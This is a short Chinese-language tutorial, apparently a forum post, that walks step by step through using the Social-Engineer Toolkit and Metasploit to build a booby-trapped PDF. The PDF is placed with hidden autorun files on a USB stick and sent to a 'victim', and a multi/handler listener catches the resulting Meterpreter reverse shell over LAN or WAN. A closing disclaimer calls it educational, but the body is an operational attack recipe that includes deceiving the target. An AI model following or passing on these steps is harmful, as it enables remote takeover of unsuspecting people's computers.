要求 :
-
Metasploit 框架
-
操作系统 Windows 或 Linux。
请按照以下步骤->
1-打开你的终端
2- 写 cd/pentest/exploits/set
3- 使用./set命令运行你的社会工程工具包
4- 选择3号Infectious Media Generator,然后下一步您可以选择 File-Format Exploits,因为我们不会使用直接的可执行文件漏洞利用
5- 输入反向连接的IP地址->填写您的IP地址(攻击者IP地址)
6- 选择要利用的文件格式(实际上您可以选择要使用的漏洞利用,但在这种情况下,我使用默认的数字 11“Adobe PDF EXE 社会工程)
7- 如果你有自己的PDF那就更好了,也许你可以使用其他人感兴趣的东西来打开它,在这种情况下,我使用我的PDF Exams.pdf
8- 有一个选项可以让你将pdf留空[但不推荐]
9- 现在将生成你的文件夹
10- 去隐藏自动运行和模板文件
11- 之后将它们放入USB
12- 将其发送给受害者 [等到他打开pdf]
13- 启动 Metasploit 监听器 [Multi/handler]
14- 设置你的有效载荷
15- 设置你的lhost [如果你想入侵局域网,你的本地IP,如果你想入侵WAN,你的公共IP]
16 型跑
17- 将提供一个Meterpreter连接 [不要忘记打开4444或80端口]
免责声明此内容仅在教育和非营利目的下共享。此教程是让你简单了解过程,没让你实际操作